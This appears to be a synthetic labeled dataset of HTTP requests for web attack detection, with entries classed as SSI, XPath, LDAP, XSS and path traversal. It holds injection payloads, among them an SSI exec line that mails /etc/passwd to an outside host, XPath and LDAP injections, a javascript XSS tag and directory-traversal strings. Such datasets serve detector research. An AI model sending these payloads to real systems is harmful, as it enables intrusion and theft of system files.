ETag: W/"eRpmRkmZ96ktFwtKx"
Expect: mnteO
From: cI4oaebh@nrntt4iEtl.fr
If-Modified-Since: Sat, 17 Sep 05 02:12:35 CET
If-Unmodified-Since: Mon, 07 Nov 05 15:48:12 CET
If-Match: *
If-None-Match: "1zva9@FNdOT8nIf"
If-Range: "v-lub7Me1IPbwi8kUN"
Max-Forwards: 9
MIME-Version: 9.7
Pragma: i=eftw
Proxy-Authorization: Digest cnonce="suean1t"
Authorization: Digest qop=auth-int
Range: -80,3-,-9028
Referer: http://9oqho.biz/ltWweeer/Llrecn/hrNbenaw/arsqcilh/rN6ab7ct.exe
TE: gzip,trailers
Trailer: Via
User-Agent: t.jureNjx http://www.asaspe.st
UA-CPU: Sparc
UA-Disp: 970,105,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 949x9593
Via: FTP/4.9 www.ue5dc.gif
Transfer-Encoding: ttC8un; itS0in=ebUG
Upgrade: tNaw/6.0, n1eien/5.5, iol/1.2, Rlt5/6.0
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 75943929627
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 44489
Start - Id: 39326
class: SSI
GET /oidao/prf1womedmny/mhQgRK@-/uothei1b1.css?0Esh=rai1yoHttIisi&asmkgaumeyhrayt=%3C%21--%23email+fromhost%3D%22www.eloises9.com%22+tohost%3D%22mailbox.zros.com%22+message%3D%22itsana+dtmLiu+Cr3orr+reunuu%22+fromaddress%3D%22trtob.com%22+toaddress%3D%22toiN.ral1.com%22+subject%3D%22e%22+sender%3D%22at.com%22+replyto%3D%22ddflnhf.com%22+cc%3D%228pi%22+inreplyto%3D%22xo+haO+mc%22+id%3D%22htemail%22+--%3E&tjcsl3hnrhwtae=97b%5Do5x&1n=eouTyetimge%25symd&uf=uiQblvl39V&tmp9Lwp-4ARC=CT&ttlphor=37485&gnnael=%24H&osbp=g68IgTQ&ntetbmn3l0N5sc=pxrStutewhA&rtcr6cT1dheesr=7 HTTP/1.0
Host: 202.222.235.30
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: fionWeu-sh, a-tieuxac;q=0.4, 7a-s, eoutned-mlifowro, iNLem-liail
Cache-Control: no-store
Client-ip: 108.73.42.141
Cookie: OAIwmc=s;rrdtuldo=zdifr
Cookie2: $Version="44"
Date: Wed, 04 Jun 08 21:20:36 GMT
ETag: "NkGZJgLmq2ooIWKkf"
Expect: 100-continue
From: fiaotu@eNeFi.it
If-Modified-Since: Thu, 09 Oct 08 12:36:37 CET
If-Unmodified-Since: Fri, 10 Apr 09 23:55:52 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 19 Mar 10 23:09:39 CET
Max-Forwards: 27
MIME-Version: 5.7
Pragma: xa=eti7n8
Proxy-Authorization: Digest opaque="nbcimQad"
Authorization: Digest algorithm=bg8hmtq
Range: -7892
Referer: /igsee8/jt0Loa/9tnxm.tiff
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.2 (Windows; U; Win98 7.3; ht-ur; rv:9.1.6) Gecko/39942551
UA-CPU: x86
UA-Disp: 593,4970,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 9132x248
Via: HTTP/2.9 www.eiaYgktt.css, 6.8 www.tlWno.tiff, 7.9 www.5vsec.png
Transfer-Encoding: gzip
Upgrade: hsyn/7.1
Warning: 603 www.gfjcoE2.gif "tntsi" "Thu, 02 Nov 06 09:59:58 UTC"
X-Forwarded-For: 252.189.82.224
X-Serial-Number: 802337450581
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39326
Start - Id: 39966
class: SSI
GET /iQiK/tFX8crOA0/u3atohdosesphmla/8JpuZkTVl.HfErC60E/wcetinoJehtsatAeaye/trDocdbvgbZeaye/b3andaisbpnihu/TWY-Wposition4Ap9w2_.tiff?_y0.LX=ldoe%40t&9Q.hEA=aca%406BGSd6o&Lahiuhrellea=r%40vdWL&ne=hrhdsncgdryeh&sGhsfsaoia4ehix=tlto&zE=EIeyy7yi9&lzHiphterm=998408&aa=0843572&sN8Kmi7rb=v%7EsHu%2Fe%3F&gtdisySvBZtO=393353&nrodtib962ga=Ne&esyrdontibTl=1e%3Ftnode3gt+%24nbot&ase=e7yLcg34B&r4hoaewieyreli=ise&vah2=%3C%21--+%23exec+++++cmd%3D%22%2Fbin%2Fmail+++ihiaerrzj.com++++%3C++%2Fetc%2Fpasswd%22--%3E HTTP/1.1
Host: www.tehfe.com
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, gzip;q=0.1, compress;q=0.9, gzip;q=0.4
Accept-Language: incBztnd-l;q=0.2, hentn-koiikht;q=0.9, T15g-trm;q=0.9, n7lSe3-htew;q=0.2
Cache-Control: max-stale
Client-ip: 183.52.12.49
Cookie: urlorxs=aeotroaS8L;leueauDgAt=3656;jun=4
Cookie2: $Version="03"
Date: Wed, 21 Apr 04 09:50:19 UTC
ETag: W/"Nu6lFddZ0hfIrZR"
Expect: 100-continue
From: ebwhssyt@lxhcar.gov
If-Modified-Since: Thu, 23 Jul 09 20:11:20 GMT
If-Unmodified-Since: Fri, 05 Jun 09 24:30:08 UTC
If-Match: *
If-None-Match: *
If-Range: "YavZqkjOeTOFp6nQ"
Max-Forwards: 2
MIME-Version: 1.4
Pragma: o=s8aa
Proxy-Authorization: aHtMee s2lgu=6eHelq
Authorization: Basic ZHJpdGpwdm86aXFmZWZj
Range: 67904-931063
Referer: http://etnob.it/94int/4Ten.txt
TE: trailers,trailers,trailers
Trailer: Accept-Charset
User-Agent: eibizdTyqoohtsriI
UA-CPU: Sparc
UA-Color: color16
Via: nosl/3.7 243.6.211.69, 0.1 www.njhyrit.shtml:0882, 0.3 www.A7Alsd7.css
Transfer-Encoding: deflate
Upgrade: snt/4.7, 9diah/5.8, zl6/2.7
Warning: 323 13.31.57.254 "dinvatrVko1snr" 
X-Serial-Number: 754321
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 39966
Start - Id: 48860
class: XPathInjection
GET /1VRpWAeU.1@-yO0/zxatocOb/p5JLsoq66U4MAj-aoP5j/Eodsegl1elun9lnou6.mdb?noderm0dsam_zwF54=t-&jtd0XttaAtrl=54085&vrrpV=6+re3n5&Eg=30789&omgt0t=%2B&r2ta1mdo7oozmi=4&NJvCfsEC=daloef&Oorereayloaap=2+++or+++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or+++++774%3D&noEMemi1q9ler=97979856&saepy7t51fena=7962&lh6nemlhuzneeeI=Z HTTP/1.1
Host: 127.65.77.72
Connection: dpam
Accept: text/plain, image/jpeg, image/png
Accept-Charset: *;q=0.2
Accept-Encoding: compress
Accept-Language: e6e-sTy, Eye-1s;q=0.7, gtny4e-n;q=0.9, enT-lnTfsoh
Cache-Control: only-if-cached
Client-ip: 107.196.0.55
Cookie: 0mRsevgdttraAg=yBgC5vz;OucaEn9xMtshutdownn=47;Zi5xHF=2;he2=1;betdCH=nrsSVF1.
Cookie2: $Version="34"
Date: Thu, 29 Mar 07 18:12:07 GMT
ETag: "_fRV_D@7oKn-qsK"
Expect: akafu79
From: cSenj7od@i5ssuRhni.com
If-Modified-Since: Tue, 20 Oct 09 23:29:35 CET
If-Unmodified-Since: Thu, 11 Nov 04 21:22:43 CET
If-Match: *
If-None-Match: "yGPXJDIkby_lr@n"
If-Range: Wed, 01 Sep 04 11:44:57 CET
Max-Forwards: 75
MIME-Version: 4.5
Pragma: s9l=yl7ph
Proxy-Authorization: sies2t issr=m6mr
Authorization: NTLM aDJlbW5kRGd2SHN0aVFhc3A5MXR0cm44dHAxZU9hc3Jpcw==
Range: 572-841,573-
Referer: http://hRi8cre.st/tndruHo/aic0l/siTs75ra/jtf7fr/rlEp.txt
TE: chunked;q=0.7,chunked,gzip;q=0.0
Trailer: Accept-Charset
User-Agent: 6iT2sbhreT
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1420x8323
Via: 5.6 www.f5iV4.tiff, 9n6/8.5 70.204.245.100
Transfer-Encoding: REal; iHyshvu=aoilttln
Upgrade: wrmk/0.8, tyuf/8.4, rih/4.1
Warning: 031 102.38.172.102 "nisa2e2yv" 
X-Forwarded-For: 156.103.50.172
X-Serial-Number: 6876836791453
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48860
Start - Id: 44796
class: PathTransversal
GET /eQMhttpT/IxOsyxNI_.eF/_eQO_kq/FcXrhJ1/G./obFUD/mailP/EnCefezuetw5al4j/OPB.stdin-k.dll?ortsEiend=+nhavinge%3A&sra7=5o0Iexz8i&gahortu5eot=4&Q4A5Mistelnet=dj&mn8sxth=sv9mgSm3&5iOre=eeee6H4oceiaenzmra&ianhii=3&Nnw7=6rmearopenf&V0XZ=autdmEs0norib&jcr4i=doc%28file%3A%2F%2F%2Fc%3A%2FsmPa%2Fmensnt.xml+++%29&s2nst=wab9htneonsairsewB&aeehiacyelmdeOc=uowmdndriipf&zqGHQRxmlTtscriptd=1350 HTTP/1.1
Host: 56.244.253.174:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-age=4974
Client-ip: 166.74.134.8
Cookie: utatoui=  iineIe5betweenfromp0nynRdor(;pamr=1tnfh;_8U9jLP=284855;gitsouI=wfnraetuyaoKhe;fieomesrsgh=elsformnahAnedaer\;5ai5ZdIGlJFM=petB7pcnkmCH
Cookie2: $Version="56"
Date: Thu, 12 Jan 06 08:47:58 GMT
ETag: W/"3uIGEXCjynhQzhA"
Expect: 100-continue
From: Cmaxdcp@rimabEod.be
If-Modified-Since: Tue, 19 Jul 05 15:44:20 CET
If-Unmodified-Since: Wed, 02 Apr 08 21:37:59 UTC
If-Match: *
If-None-Match: "recqCUxNclLJEVZDwYA"
If-Range: Thu, 05 Jul 07 13:20:12 UTC
Max-Forwards: 239
MIME-Version: 7.4
Pragma: foct='baer9g'
Proxy-Authorization: Digest qop=auth
Authorization: Digest uri=http://www.LIst.org/Raue/prueq9y.cfm
Range: -31658,860-,84040-975982
Referer: /e6tyI8en/nyvoMhg4/acssraa3.mpeg
TE: trailers
Trailer: Expect
User-Agent: meiEjG9 http://www.vutnso.com
UA-CPU: MIPS
UA-Disp: 3445,5667,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5717x165
Via: 7.4 www.bcgs.tiff, 2.6 www.YodeE4.shtml, 9.6 25.113.223.183:1
Transfer-Encoding: deflate
Upgrade: ntSos/7.8, twuyc/7.4, v1khi/3.8, ftess/6.0
Warning: 136 www.f72ts.jpeg "daakn3ltgiptelaits" "Sat, 10 Oct 09 20:12:41 UTC"
X-Forwarded-For: 4.75.179.74
X-Serial-Number: 2157159271334
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44796
Start - Id: 49700
class: XPathInjection
GET /nr/45g8A8-U4sR2m/tu/lzee/OAM38uxusrcV.c/lZBXEtx954s7heNk/OKB_bhaving9n5tO1zu.cfm?orc70lPsYlocationT=58005&tjdnyi4noaJaedW=t0%3A&lesatcdeInapme=5537&ats7el3s=tOhtacces&utnee=jezaoelt%27++or+count%28+++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28+i++%2B++++j++++%2B++++k++++%2B+l+++%2B++1%29%5D+++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or++%27e8Asrcaz%27%3D%27++tytgwio%27+++or&bo=cPBXXpS&ydk=e&emm9eonriea=s&xn9assxo1exphbt=prnhomeDsce&sC=7377862&ay4Jhe3optx=aFB&Kki0xU0=00917&se4iNroscTrCseu=697620&neiwtielRtN=qiknpwb HTTP/1.0
Host: 199.107.10.0
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: windows-1253, iso-8859-9;q=0.6
Accept-Encoding: compress;q=0.5, identity;q=0.9, gzip
Accept-Language: i5mnn2-roDeot;q=0.0, nyenvr9-vP9, reon-hmhacxa
Cache-Control: min-fresh=83646
Client-ip: 251.247.9.85
Cookie: Teftgoaelojrax=9tNhutrv;aeTtanieqwrdi=giXCF_tvV8;angse=ly7-Yd-4;ualaqkGn7br24=20264302
Cookie2: $Version="03"
Date: Sun, 11 Feb 07 09:24:16 CET
ETag: W/"s3klw_r.kke6tQh"
Expect: iazqtree
From: tmHtei@9Eaetn4.de
If-Modified-Since: Mon, 04 Jan 10 03:07:35 GMT
If-Unmodified-Since: Sun, 04 Jan 04 11:49:28 UTC
If-Match: "a@y2@-2rgEL840pQ"
If-None-Match: *
If-Range: *
Max-Forwards: 95
MIME-Version: 8.1
Pragma: astao5rF=neeiei
Proxy-Authorization: Digest uri=http://ne8ihAoe.gov/rosa/iAser/drnUkate.aspx
Authorization: aizl celi3ol=Reesi
Range: -394122
Referer: http://qwt2.st/ee4ii.mdb
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: oPoontah (adavUB9nE; iKvE5vF; aOy_Un; trjB9wq1; d@.@dqqj)
UA-CPU: StrongARM
UA-Disp: 2722,5111,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6094x1402
Via: HTTP/7.0 www.oe5nl.jpg, 9.6 www.Parxds.js, 5.6 207.194.62.105:89
Transfer-Encoding: identity
Upgrade: ierniu/6.4, ytteh/9.3, ahoito/8.8
Warning: 928 www.sea4hf7.png:6529 "guetn6bIulNebhuhnEd" "Fri, 08 Apr 05 24:10:56 UTC"
X-Forwarded-For: 76.177.20.101
X-Serial-Number: 58499118
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49700
Start - Id: 37662
class: LdapInjection
POST /VURalllK51u._Y/Ddocumentg8CyGIH/ru815Z3/2vKasaccess_log0Bll.aspx? HTTP/1.1
Content-Length: 202
Content-Language: sdot
Content-Encoding: identity
Content-Location: /aAmepr/seevidd9/rpo6.php3
Content-MD5: N2xvYW9kSWhuYWJ0bnF0Vw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 31 Mar 04 06:33:46 GMT
Last-Modified: Mon, 26 Apr 10 09:18:50 UTC
Host: 116.86.120.254
Connection: close
Accept: */*
Accept-Charset: x-mac-ce
Accept-Encoding: deflate, identity, identity, deflate
Accept-Language: *
Cache-Control: no-store
Client-ip: 88.224.210.21
Cookie: N7sqCQ8C=80832
Cookie2: $Version="657"
Date: Sun, 30 Apr 06 21:19:34 GMT
ETag: "L1wKH0qc0h5OgNanY"
Expect: raso5lm
From: TttDoe@rczep.it
If-Modified-Since: Fri, 12 Sep 08 16:38:18 GMT
If-Unmodified-Since: Sat, 13 Mar 10 22:27:55 CET
If-Match: "5qVSlFtCPr@W6bgJit"
If-None-Match: *
If-Range: *
Max-Forwards: 7858
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Digest uri=/heen1roq/eredadu/eloyue/dceeE.cgi
Authorization: Digest qop=elac
Range: 7-75,773-,28-851
Referer: http://ooouow.st/deueUi/wrvltw/8detih/aini.aspx
TE: deflate;q=0.0
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.1 (X11; U; Open BSD i586 9.2; hi-pp; rv:4.2.9) Gecko/93038205
UA-CPU: StrongARM
UA-Disp: 770,856,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 940x1719
Via: 1.2 www.sgqnnra.js
Transfer-Encoding: gzip
Upgrade: pemoEi/4.0
Warning: 026 155.240.111.33 "facqeennibgrcecdveu" "Wed, 19 Jul 06 04:22:04 GMT"
X-Forwarded-For: 62.169.63.215
X-Serial-Number: 0737126851
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

arneuua=otlnhl&Dithm=96452653&6ua6Txa=nuXx)( |   (eSiu=*)&At4a0otcehalA=&OudmRpositioner%usam&waiarhe=msinsert&hrm5rNesigsa=4i uniona6ws2replacehsock_stream&astPzhecTuqnok=4&oW=y\nSee 

End - Id: 37662
Start - Id: 49126
class: XPathInjection
GET /9h2I_hOnL@7q/aatgl5wxbyE9sAhe/vcenbftaaomtP2ur.sh?ioeudn=ajiUsvnetcatre5%7CziframeAu&csehnys=nlc3rmnenrriny&welmxhtsr5Bat=kpeR3&gVOphpFhTOcmdc=06671&eth=soo6ntsijak&m6iauC=6678013&bod73ustcfn=jE+%2Bodeepnfar+ih&Apflgx=1%2Blttnbody%3Dn%26i&Ueid=rz%27+++or+++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++++or++++%27i6mw5l%27+++%3D+%27&RaP=tfk2ldart1gann2w HTTP/1.0
Host: 208.99.35.182
Connection: keep-alive
Accept: text/*;q=0.0, text/*
Accept-Charset: x-mac-greek;q=0.6, euc-kr, iso-2022-jp;q=0.5
Accept-Encoding: 
Accept-Language: 9nfshNsh-eeRt;q=0.8, Te6afh-ie1tb
Cache-Control: only-if-cached
Client-ip: 172.57.198.77
Cookie: qeTmhstd=tX@;uxq8cB6=hF.KIUbQ;ltaatmi8edaueup=453;ttc0=83048532;nosTntserhDyN=mros8~h9dj)r)rs;eairbOnfyhv=8353243
Cookie2: $Version="54"
Date: Tue, 11 Mar 08 05:42:37 GMT
ETag: W/"Tvi9KhEHOu0-YyM"
Expect: 100-continue
From: NktwIe@earsOsuo.org
If-Modified-Since: Thu, 13 Mar 08 12:24:22 GMT
If-Unmodified-Since: Wed, 30 Jun 04 12:49:32 CET
If-Match: *
If-None-Match: *
If-Range: "-m__3mTvQ_-vhY8b"
Max-Forwards: 0
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Basic YWFpZDpkYW90YW5q
Authorization: Digest uri=/etan5eu/Td7eez/2akw8i.php3
Range: 137110-8612,-4,90364-3
Referer: http://www.45Bjl637.de/cmdsT/ttliboit/8mwYat/yowfeto.php
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/2.3 (Machintosh; U; PPC 5.5; 8n-e1; rv:6.1.7) Gecko/78549201
UA-CPU: StrongARM
UA-Disp: 3801,296,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 468x973
Via: FTP/6.6 7.245.28.153, 6.6 www.EhIep.html
Transfer-Encoding: compress
Upgrade: enn72/7.1, EYeuT/2.5, saodes/7.2
Warning: 387 www.5rttc.html "iatlob" 
X-Forwarded-For: 91.195.205.35
X-Serial-Number: 0092197
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49126
Start - Id: 49471
class: XPathInjection
GET /dHrhEm.GZGLEM/P1rwMo8kq/coiyoiAryehb2itatir/01VH657/didr76tr71o1ts/fiornooo.exe?aa5rswhechsl8=t%2Ft%2FP%2Fchild%3A%3Anode%28%29%5B+++position%28%29%3D30%5D++++%7C+++++m%2Fhm%2F4ter%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D86%5D+or+%27gitw8een%27%3D+++%27 HTTP/1.0
Host: 79.149.195.196
Connection: nAepm
Accept: image/*;q=0.0, text/*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: U-Etegra1, wo9eeQm-hei3iZ;q=0.1, abtiaYhi-1n, iidef-0gh;q=0.1, esa7a-a
Cache-Control: max-age=27
Client-ip: 176.14.182.206
Cookie: rtoontte=l0d1reti3vomeuarr;dOe=qWC;rt=bhtpass=efnri
Cookie2: $Version="4"
Date: Tue, 24 Feb 09 07:28:45 CET
ETag: W/"8WDs@-d9IdX423MDOwo"
Expect: 100-continue
From: 8tns@scEoyunm.org
If-Modified-Since: Tue, 25 May 04 19:26:20 GMT
If-Unmodified-Since: Sat, 22 Aug 09 13:41:27 CET
If-Match: *
If-None-Match: "6Xx3uW0oqohpEDCg6"
If-Range: "L2_eRyjXKIW6hbHqV5"
Max-Forwards: 7
MIME-Version: 2.1
Pragma: e=uet
Proxy-Authorization: so9ts otea6n=hdva
Authorization: Digest nonce
Range: -012
Referer: http://www.aeRiletl.be/ce6eT/osllwqog/sCre/osmpmNd.jpeg
TE: gzip;q=0.0,gzip
Trailer: Cache-Control
User-Agent: Mozilla/9.6 (Machintosh; U; PPC 6.0; in-lf; rv:0.9.9) Gecko/46361012
UA-CPU: PowerPC
UA-Disp: 198,205,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 527x1451
Via: 7.8 www.snxjsone.shtml, FTP/4.9 www.en7ieCVe.html, 3.3 206.21.178.194
Transfer-Encoding: identity
Upgrade: nueei/2.7, enf/8.5
Warning: 811 www.h0iseed.jpg "Eayaooe2bzy9a" "Fri, 24 Nov 06 06:59:07 UTC"
X-Forwarded-For: 64.1.22.247
X-Serial-Number: 008046
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49471
Start - Id: 48947
class: XPathInjection
GET /mjo.asmx?qa2rode=koxHi%2B0a%25+%3Ate%3B%7Cdx949&uibi=93&JBg6Y=ht162&UCgydOauL9=2vbXLqu&red=40848&ooqwwaea=ytp&iframeGMFaccept=47&x_Cudjihgroup by=ezsw%2FeIjehu%2Fto%2Fchild%3A%3Anode%28%29%5B++++position%28%29%3D7%5D+++++%7C+sbgnY%2Fu%2Fetj%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D948%5D++or+++%27Eln%27++++%3D++%27 HTTP/1.1
Host: 208.91.119.243
Connection: to1tn2
Accept: */*
Accept-Charset: x-mac-chinesetrad;q=0.6, windows-1258, windows-1253
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.9
Cache-Control: max-stale=004
Client-ip: 203.176.34.179
Cookie: tdOa8iajweD8h=yIUZq;aeei9u8ltr=dsataktp6m;oftq6Rtwdee=73
Cookie2: $Version="818"
Date: Wed, 20 May 09 05:08:26 CET
ETag: "i8pw8MiXbYxDFs-"
Expect: 100-continue
From: 11ria@soa2e.be
If-Modified-Since: Tue, 26 Feb 08 09:08:50 CET
If-Unmodified-Since: Sat, 28 May 05 08:29:09 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 14 Aug 06 17:40:55 UTC
Max-Forwards: 120
MIME-Version: 8.7
Pragma: 2olct=t
Proxy-Authorization: Digest response="bDD9738c8b7dB2ba67BAcc1DF2f5adcE"
Authorization: NTLM OWFoNm51aXR0c3Q5Y25yOWlhdHJzbWlzZWhhc2VOaTBlcw==
Range: 326-470558,-0121
Referer: http://www.Dgtnei.it/xltilm/teuloee/eAgl/Crafsel7.php4
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/9.0 (Machintosh; U; PPC 6.7; mi-Vh; rv:7.2.7) Gecko/35798797
UA-CPU: 68000
UA-Disp: 3657,5420,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 2276x9830
Via: ieugo/6.8 www.Tos7pO.js, 2.5 www.islun.tiff, ogpsx/1.4 www.iacLnt.png:0
Transfer-Encoding: compress
Upgrade: neho/9.5, zih7sw/6.0, yitr/8.3, e0e6er/6.0
Warning: 219 www.NUeeo.shtml "r8tNtaTA" 
X-Forwarded-For: 9.137.128.106
X-Serial-Number: 544350626543951868
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48947
Start - Id: 46918
class: XSS
POST /cn0mryIdte/dh.cgi? HTTP/1.1
Content-Length: 338
Content-Language: em93n,ssntes,amaoj9
Content-Encoding: compress
Content-Location: http://www.t7ex.fr/witoue/ehts/rrIswTEt/k0bgsfc/tU7ce.dll
Content-MD5: bGxmdGNhaW9kZUlvc3Nucg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 01 Apr 08 20:20:19 UTC
Last-Modified: Sat, 12 Mar 05 22:20:01 GMT
Host: www.onejt.st:19571
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: windows-1258;q=0.9, iso-8859-4, euc-jp, windows-1254
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: i7osesh='xh'
Client-ip: 67.18.221.141
Cookie: eIl9deea=enp;CtSPKSC=ahs-mm;vhAmny=5485759138;nisr4rioka1h=ds|tA
Cookie2: $Version="1"
Date: Sat, 31 Dec 05 13:53:47 GMT
ETag: W/"GrP4IKP7N3PcZKc1rE"
Expect: iDsrt
From: nlqn@timuoEgjAR.ch
If-Modified-Since: Sun, 27 Jan 08 07:31:23 GMT
If-Unmodified-Since: Sat, 20 Jan 07 24:06:00 GMT
If-Match: "ifgnEX6zRgo.d-5uoS"
If-None-Match: "cP5SBg1GzHpSSVKEf2EL"
If-Range: Sat, 29 Apr 06 03:10:29 CET
Max-Forwards: 76
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: NTLM Y2NlbUFhZmIzc3JobmUwMm14bGVyZWlpbWk4eGVUZzJocmVodGluRWl4aXRuaVo=
Authorization: cisore 8eMlkeoe=esttheee
Range: -790
Referer: http://Asntolib.be/yrpds.css
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: 2oetad40 (zM7qQlE; eD3UqXv; exVZ4qRa; njKnV-s)
UA-CPU: MIPS
UA-Disp: 2330,130,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 537x7894
Via: eat/9.4 www.tn2hnr.jpg, FTP/9.3 53.118.0.195, mria/2.3 www.ezc1ww.tiff
Transfer-Encoding: ianwb; 8tue=ay4t
Upgrade: sdW/7.9, agrd/5.9, wt6wa9/7.2
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 3374825125599046
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ursntctcMr0ctT=6&sonrgn=tXaSgA1oS&eAhtt7nrcx=dAal&heRsh=4878755&trwm=<img  dynsrc =    "    javascript:[alert ('uGabnmou');] "   >&ae0swhNsqh=rTpCXCsWvj&1JiWnIrer4=5961652&to=sphpzoy daEtm9EApcctR&tdsWt=9316544&fU=ste=&lw2aSmeaR=ty5Bj_&nEnsIlswatwisz=43719&92gr5stziarm2Ml=108615&._FL=o3x&tou=UeehwLahdfir8tTm5

End - Id: 46918
Start - Id: 39386
class: SSI
GET /Tigo2cuopE9few/unce3iO/eVNDJfWu49ubn1.a5/ejwoap7oiheruHhAEhi/3htbee8e9mitxw5el.asp?sedhael041wbde=0222185&rttkde6iynre=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&p5ehesvea9e6=0592550 HTTP/1.1
Host: 32.171.19.195
Connection: tehuegR
Accept: audio/basic, video/mpeg;q=0.6
Accept-Charset: windows-1254;q=0.9, x-mac-ce;q=0.1
Accept-Encoding: gzip
Accept-Language: tniZssrn-gedicbig, nuadtE7T-lneoa5a;q=0.3, opleqsee-l9lm, rTuE-ed8W;q=0.7
Cache-Control: no-store
Client-ip: 242.172.212.87
Cookie: ThoydzEne59R=0774;alauccrrboaes=dUc;hi=+HRl;siLwprEsrhno5f=449;PrUF=ioc1
Cookie2: $Version="826"
Date: Mon, 26 Jul 04 10:00:12 GMT
ETag: "lDDdeICjGfQ3NK@NFBX"
Expect: bnehhbgf
From: lece@srdgy.org
If-Modified-Since: Wed, 27 Sep 06 10:07:28 UTC
If-Unmodified-Since: Fri, 15 Apr 05 19:40:18 CET
If-Match: "2JNGRrtNLA3hVQJc"
If-None-Match: "Ywl2nk3GWx5g8osfI_U"
If-Range: Fri, 23 Apr 10 14:35:24 GMT
Max-Forwards: 7158
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: OwNJ ihni=nlyne9
Authorization: NTLM bGVhcmlubmhjb0FGclNkc3VlZXRlZG10Y05zM3Rsd2VOdDVybQ==
Range: -7403,569103-
Referer: http://tclo.org/taordabj.js
TE: gzip,trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.2 (compatible; t7Rs; Unix; v0dha)
UA-CPU: x86
UA-Disp: 939,8855,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 696x8409
Via: FTP/7.1 www.fhhsuaa.jpg:4, FTP/8.2 185.148.210.24
Transfer-Encoding: deflate
Upgrade: Trtet/1.3, sieet/3.4, eced/6.6, yns/9.1, snfH/3.3
Warning: 436 www.siscd.jpeg "oiebdEomsriX" 
X-Forwarded-For: 98.145.13.52
X-Serial-Number: 3967259354
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39386
Start - Id: 45298
class: PathTransversal
GET /1seewdddne/ZkoAprocessing-instruction@re5op/Dhm3/9zAn.fm/Krb6/h4AMN8r_hY55hKwOB_/slW_lXex/QUHFecho..php?ueeRtaN7g=942&isef7igcaG=1dDoden2%5Di&ssTexecb=amsfdRodo%3Dlvaro8n%7Ca+5&locationvcwU-Zsamv2location=718753079&5niocoueeyvjh=854&i703xtbn1iynq=4186&nCstilebetd0tn=oirthUn0esloudo&e-xtwp-kK=sFhwzRIzrl6&ed=f%40input%2B%3Ei1%3Bopkm4%3DT+&ctieh79tw3dsRd=1502521566&Tonwxnaossm=499&2sdotwiarsD=E8orietszreayge HTTP/1.0
Host: www.erXbutte.st
Connection: close
Accept: text/*
Accept-Charset: gb2312;q=0.7, x-mac-greek;q=0.2, windows-1254
Accept-Encoding: ..\..\..\..\WINNT\system.ini
Accept-Language: *
